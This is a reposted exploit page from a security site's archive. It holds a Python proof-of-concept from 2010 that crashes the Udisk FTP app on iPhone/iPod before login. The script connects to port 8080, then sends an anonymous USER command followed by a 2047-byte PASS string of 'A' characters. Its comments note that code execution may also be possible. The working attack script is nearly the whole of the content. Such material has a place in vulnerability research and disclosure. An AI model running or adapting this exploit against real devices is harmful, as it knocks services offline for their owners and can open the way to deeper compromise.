首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apple Iphone/Ipod Udisk FTP basic edition Remote pre-auth DOS vulnerability
来源:http://www.corelan.be:8800 作者:mr_me 发布时间:2010-01-13  

#!/usr/bin/python
#
# Apple Iphone/Ipod - Udisk FTP Basic Edition Remote 0day DOS exploit
# Found by: Steven Seeley (mr_me) seeleymagic [at] hotmail [dot] com
# Homepage: http://6tags.com/n/
# Price: $4.99
# Download: From the app store (use your itunes account)
# Tested on: Iphone 3G - firmware 3.1.2 (Darwin kernel)
# Greetz to: Corelan Security Team::corelanc0d3r/ekse/EdiStrosar/Rick2600/MarkoT/
# Advisory: http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-003-u-disk-ftp-pre-auth-remote-dos/
#
# Note: This **could** be remotley exploitable with code execution.
# I have not reversed this app..

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"

print "[+] Apple Iphone/Ipod - Udisk FTP basic edition Remote DOS exploit"
import socket
import sys

def Usage():
    print ("Usage:  ./udisk.py <serv_ip>\n")
    print ("Example:./udisk.py 192.168.2.3\n")
if len(sys.argv) <> 2:
        Usage()
        sys.exit(1)
else:
    hostname = sys.argv[1]
    username = "anonymous"
    passwd = "\x41" * 2047
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 8080))
 print "[+] Connecting to the target.."
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] Sending payload.. ph33r"
    sock.send("USER %s\r\n" %username)
    sock.send("PASS %s\r\n" %passwd)
    sock.send("PWD\r\n")
    sock.close()
    print "[+] Server is now DOS'ed!"
    sys.exit(0);


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Real Player ActiveX remote buf
·Sun Directory Server 7.0 core_
·HTMLDOC 1.9.x-r1629 local .htm
·Audiotran 1.4.1 (PLS File) Sta
·Nuked KLan <= 1.7.7 & <= SP4 D
·SwiFTP v1.11 Overflow Dos PoC
·Ofilter Player (skin.ini) Loca
·TurboFTP Server 1.00.712 Remot
·Nemesis Player (NSP) Local Den
·NPlayer (.dat Skin File) Local
·Winamp 5.05-5.13 .ini local st
·Apple iTunes 8.1.x (daap) Buff
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved